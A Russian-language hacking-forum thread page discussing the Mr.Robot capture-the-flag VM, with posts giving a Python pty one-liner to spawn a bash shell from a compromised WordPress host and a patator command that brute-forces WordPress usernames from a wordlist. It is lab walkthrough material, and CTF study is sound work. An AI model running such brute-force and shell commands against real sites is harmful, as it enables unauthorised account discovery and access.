HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Задания/Квесты/CTF/Конкурсы
Перезагрузить страницу CTF. Взлом Mr.Robot VM.
   
Ответ
Страница 3 из 3 < 1 2 3
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 18.02.2017, 16:01
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию
Цитата:

ghostphisher сказал(а):

ТС уже ответил, я дополню, что в реальных случаях помогает - Enumerating usernames, мы можем с долей некой вероятности получить список пользователей WP
[doublepost=1487411932,1487409358][/doublepost]

Вот тут у меня что то не сложилось =\

Я видимо не совсем верно с данным расширением пробую работать. Можно подробнее по данному моменту?

Что именно не сложилось?
 
Ответить с цитированием

  #22  
Старый 18.02.2017, 20:40
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию
Цитата:

Vander сказал(а):

Что именно не сложилось?

Получить при помощи расширения для Firefox хэш
[doublepost=1487435544,1487432780][/doublepost]Немного дополню
Если не указать /tmp не создается файл (по крайне мере у меня)

echo "import pty; pty.spawn('/bin/bash')" > asd.py
/bin/sh: 8: cannot create asd.py: Permission denied
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asd.py
python /tmp/asd.py
daemon@linux:/opt/bitnami/apps/wordpress/htdocs$
[doublepost=1487436025][/doublepost]И вот способ как найти пользователя с помощью словаря

sudo patator http_fuzz url=http://192.168.1.29/wp-login.php method=POST body='log=FILE0&pwd=nn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.Х. ХХХ%2Fwp-admin%2F&testcookie=1' follow=1 accept_cookie=1 0=./fsocity_sort.dic -x ignore:fgrep='Invalid username'
Не мое.
 
Ответить с цитированием

  #23  
Старый 04.04.2017, 23:56
Chena
Новичок
Регистрация: 13.03.2017
Сообщений: 0
С нами: 4825198

Репутация: 0
По умолчанию
Спасибо ) Vander . Очень интересно ! И хитро )
 
Ответить с цитированием

  #24  
Старый 06.04.2017, 19:58
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию
Цитата:

AlexMen сказал(а):

Добрый час, хотел бы узнать на на Малину можно поставить? данный CTF, ноут слабенький 4 гб озу ) на виртуалку не хочеться ставить

А че нет, то? В самый раз
 
Ответить с цитированием

  #25  
Старый 06.04.2017, 22:44
Chena
Новичок
Регистрация: 13.03.2017
Сообщений: 0
С нами: 4825198

Репутация: 0
По умолчанию
Цитата:

MAdDog719 сказал(а):

Подскажи плиз. echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asd.py.

на этом этапе что то не срабатывает. Или ты предварительно создал скрипт на питоне с названием asd? и просто переместил его.
Ошибка заключается не только в кавычках но и пробел не нужен (‘/bin/bash’) будет так echo "import pty; pty.spawn('/bin/bash')" > /tmp/asd.py
 
Ответить с цитированием

  #26  
Старый 18.06.2019, 19:06
WhoAmI0
Новичок
Регистрация: 20.05.2019
Сообщений: 0
С нами: 3676504

Репутация: 0
По умолчанию
Приветствую Vander! Какие учётные данные для входа в mrRobot?
 
Ответить с цитированием

  #27  
Старый 18.06.2019, 23:32
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию
Цитата:

WhoAmI0 сказал(а):

Приветствую Vander! Какие учётные данные для входа в mrRobot?
Так секрет, это
 
Ответить с цитированием
Ответ
Страница 3 из 3 < 1 2 3



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.